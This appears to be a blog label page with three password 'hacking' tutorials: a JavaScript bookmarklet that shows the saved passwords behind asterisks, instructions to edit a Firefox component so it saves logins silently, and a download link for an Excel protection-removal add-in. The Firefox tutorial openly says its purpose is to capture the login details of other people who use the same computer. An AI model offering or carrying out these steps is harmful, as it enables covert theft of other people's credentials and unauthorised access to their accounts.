Showing posts with label Password. Show all posts
Showing posts with label Password. Show all posts

See The Passwords Behind Asterisk !










  
See The Passwords Behind Asterisk !

Hello all users,

I am going to show you in a short tutorial how to read out a password of a web browser.

Example:

http://www.gmail.com

Username: example@gmail.com
Password: **

What's my password?

Alright, now you could read out the *** stuff with a simple javascript code.

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();


All you need is to copy & paste it in the URL-address bar.



How to Hack Firefox To Auto Save Passwords Without Notification


Hack Firefox To Auto Save Passwords Without Notification

Hi all users,

Here is a short tutorial on how to get firefox to save usernames + passwords automatically with any notifications (Sort of like a keylogger) just by editing 1 of the javascript files.



ideal if you want to get someones login details who uses your computer.

1) First you need to close firefox.


2) Now locate the nsloginmanagerprompter.js which is normally found in
C:\ProgramFiles\MozillaFirefox\Components\


3) Open nsloginmanagerprompter.js with notepad ++


4) Replace the entire line 804 to 869 with the following code

var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);

When you've done that "save as" to your desktop, then drag back in to the original folder and replace the file.

Now your done go into firefox and try it out.. Smile

To see the usernames + passwords you need to click on tools at the top of your browser and go to page info then security.

They will be saved into the saved passwords section.

Excel Password Remover 2010

Have you ever forgotten your Excel workbook or sheet password?

Here you can download a FREE Excel add-in that removes/cracks sheet and workbook password protection in Excel®.

NB! This program can't remove file protection, i.e. if you are unable to open the file, this program won't help you. You could try Excel Key to remove file protection. If you need to crack the VBA-password try this one.

This Excel add-in (password.xla) works fine in Excel 5.0 and above (including Excel 2000, XP and 2003).

This program will remove passwords of any length, also passwords containing special characters.



Instructions
Loading this add-in in Excel gives you two extra menu-items on the "Tools"-menu (or equivalent in non-English versions of Excel). These are:
  1. Unprotect workbook
  2. Unprotect sheet
To load this add-in in Excel: Open it the same way you do with Excel workbooks. Installing the add-in does not work for all users.


Download here: password.xla  (zipped: password.zip)

LinkWithin

Related Posts Plugin for WordPress, Blogger...